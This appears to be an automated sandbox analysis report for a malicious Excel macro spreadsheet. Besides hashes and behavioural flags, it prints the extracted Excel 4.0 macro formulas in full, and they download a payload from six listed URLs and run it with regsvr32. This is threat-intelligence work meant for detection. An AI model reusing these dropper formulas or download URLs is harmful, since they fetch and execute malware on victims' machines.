Overview

overview

10

Static

static

10

0cb8159bd5...9.xlsm

windows7-x64

10

0cb8159bd5...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

  • Size

    29KB

  • Sample

    241120-n3gfysxapl

  • MD5

    6800e99026c89a5f6d51fd3ca6f5fd53

  • SHA1

    6f423a2703dd49ec17bf300bf03e2c946edc29e5

  • SHA256

    0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

  • SHA512

    bd320e40b8988258e9547e28e8a640010b9aeaab8b930a8976b56af2379eae9c50c7df5b4a53d23550d85872e2c11ef0505b7abe4b782327ee9b55ec85fbc6e4

  • SSDEEP

    384:FDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:5PELA2s61VECvgOZS4+NcDVOXD9F4IG

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://janshabd.com/E33ZFv/

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/

http://www.aacitygroup.com/mordacity/g29PQhuYA5x/

http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/

https://sse-studio.com/cq0xhpj/wdktmllfAYV/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0) =IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0)) =IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0)) =IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0)) =IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0)) =IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0)) =IF('OFJOV'!D21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://janshabd.com/E33ZFv/
xlm40.dropper

http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/

Targets

    • Target

      0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

    • Size

      29KB

    • MD5

      6800e99026c89a5f6d51fd3ca6f5fd53

    • SHA1

      6f423a2703dd49ec17bf300bf03e2c946edc29e5

    • SHA256

      0cb8159bd5e8308f9131f472e126ece6e2c72758935786498216346350830c69

    • SHA512

      bd320e40b8988258e9547e28e8a640010b9aeaab8b930a8976b56af2379eae9c50c7df5b4a53d23550d85872e2c11ef0505b7abe4b782327ee9b55ec85fbc6e4

    • SSDEEP

      384:FDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:5PELA2s61VECvgOZS4+NcDVOXD9F4IG

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks